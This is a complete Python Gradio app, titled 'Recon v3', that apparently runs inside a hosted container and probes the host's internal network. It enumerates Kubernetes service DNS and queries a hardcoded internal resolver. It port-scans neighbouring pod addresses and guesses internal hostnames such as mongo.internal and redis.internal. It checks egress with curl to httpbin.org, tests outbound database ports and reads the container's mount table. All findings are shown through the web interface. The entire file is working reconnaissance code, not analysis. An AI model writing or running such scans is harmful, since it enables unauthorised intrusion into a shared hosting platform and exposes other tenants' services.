import os,subprocess,json,socket,gradio as gr def recon(): r={} # 1. DNS-based K8s service discovery r["dns_srv"] = {} svc_queries = [ "*.default.svc.cluster.local", "*.kube-system.svc.cluster.local", "kubernetes.default.svc.cluster.local", "kube-dns.kube-system.svc.cluster.local", ] for q in svc_queries: try: addrs = socket.getaddrinfo(q, None) r["dns_srv"][q] = [a[4][0] for a in addrs][:5] except Exception as e: r["dns_srv"][q] = str(e) # 2. Try nslookup/dig for SRV records for query in ["_https._tcp.kubernetes.default.svc.cluster.local", "any kubernetes.default.svc.cluster.local"]: try: p = subprocess.run(["nslookup", query.split()[-1], "10.108.0.2"], capture_output=True, text=True, timeout=5) r[f"nslookup_{query.split()[-1]}"] = p.stdout[:300] except Exception as e: r[f"nslookup_{query.split()[-1]}"] = str(e) # 3. Try to reach pods on same subnet (10.108.28.x) r["subnet_scan"] = {} my_ip = "10.108.28.16" base = ".".join(my_ip.split(".")[:3]) + "." for i in [1, 2, 5, 10, 15, 17, 20, 50, 100]: target = f"{base}{i}" if target == my_ip: continue try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) rc = s.connect_ex((target, 7860)) r["subnet_scan"][f"{target}:7860"] = "OPEN" if rc == 0 else f"CLOSED rc={rc}" s.close() except Exception as e: r["subnet_scan"][f"{target}:7860"] = str(e) # 4. Check if we can reach other HF internal services via DNS r["internal_dns"] = {} for host in [ "hub.internal", "api.internal", "datasets-server.internal", "mongo.internal", "redis.internal", "postgres.internal", "elasticsearch.internal", "hub", "api", "datasets-server", "moon", "moon.internal", "hub.hf.space", "api.hf.space" ]: try: r["internal_dns"][host] = socket.gethostbyname(host) except: pass # skip non-resolving # 5. Check egress - can we reach the internet? try: p = subprocess.run(["curl","-s","-m","3","https://httpbin.org/ip"], capture_output=True, text=True, timeout=5) r["egress_ip"] = p.stdout[:200] except Exception as e: r["egress_ip"] = str(e) # 6. Check /proc/self/mountinfo for volume mounts try: with open("/proc/self/mountinfo") as f: r["mounts"] = f.read()[:1000] except Exception as e: r["mounts"] = str(e) # 7. Outbound port test - which ports are allowed? r["egress_ports"] = {} for port in [80, 443, 8080, 8443, 3306, 5432, 6379, 27017, 9200]: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) rc = s.connect_ex(("httpbin.org", port)) r["egress_ports"][str(port)] = "OPEN" if rc == 0 else f"CLOSED rc={rc}" s.close() except Exception as e: r["egress_ports"][str(port)] = str(e) return json.dumps(r, indent=2) gr.Interface(fn=recon, inputs=None, outputs="text", title="Recon v3").launch()